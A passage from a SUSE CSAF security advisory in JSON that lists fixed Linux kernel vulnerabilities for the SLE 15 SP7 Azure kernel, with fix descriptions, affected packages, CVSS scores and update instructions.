tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
